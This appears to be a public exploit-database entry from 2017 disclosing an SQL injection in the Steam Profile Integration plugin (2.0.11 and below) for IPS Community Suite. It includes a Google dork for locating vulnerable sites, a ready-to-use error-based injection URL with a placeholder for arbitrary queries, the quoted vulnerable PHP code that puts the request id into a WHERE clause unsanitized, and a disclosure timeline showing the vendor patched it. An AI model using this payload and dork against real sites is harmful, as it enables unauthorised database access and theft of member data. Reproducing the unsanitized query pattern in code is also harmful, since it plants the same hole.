34 lines
No EOL
1.6 KiB
Text
34 lines
No EOL
1.6 KiB
Text
# Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection
|
|
# Google Dork: inurl:tab=node_steam_steamprofile
|
|
# Date: 13/03/2017
|
|
# Exploit Author: DrWhat
|
|
# Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/
|
|
# Software Link: https://invisionpower.com/files/file/8170-steam-profile-integration/
|
|
# Version: 2.0.11 and below
|
|
# Tested on: Windows Server 2008 PHP7 & Linux Debian PH5.6
|
|
|
|
# SQL Injection/Exploit: http://localhost/path/index.php?app=steam&module=steam§ion=steamProfile&do=update&id=[USER_WITH_STEAM]%' OR EXTRACTVALUE(1001,CONCAT(0x3A,([QUERY]),0x3A)) AND '%'='&csrfKey=[CSRF_KEY]
|
|
|
|
|
|
# Vulnerable code: /sources/Update/Update.php updateProfile() function
|
|
# 532: $ids = array();
|
|
# 533: $steamids = '';
|
|
# 534: $select = "s.st_member_id,s.st_steamid,s.st_restricted";
|
|
# 535: $where = "s.st_steamid>0 AND s.st_restricted!='1'";
|
|
# 536: if($single)
|
|
# 537: {
|
|
# 538: $where .= " AND s.st_member_id='{$single}'"; // $single is $_GET['id'] pass through the router
|
|
# 539:
|
|
# 540: /* Is the member already in the database ? */
|
|
# 541: $s = \IPS\steam\Profile::load($single); // IPS Profile model cleans the request and successfully executes the query
|
|
|
|
|
|
# 573: $query = \IPS\Db::i()->select( $select, array('steam_profiles', 's'), $where, 's.st_member_id ASC', array( $this->extras['profile_offset'], 100), NULL, NULL, '011'); // Our payload is then later executed in the $where variable unsanitized
|
|
|
|
|
|
# Timeline
|
|
# 13/03/2017: Exploit discovered
|
|
# 13/03/2017: Vendor notified
|
|
# 14/03/2017: Vendor confirmed vulnerablity
|
|
# 15/03/2017: Vendor releases patch 2.0.12
|
|
# 15/03/2017: Public disclosure |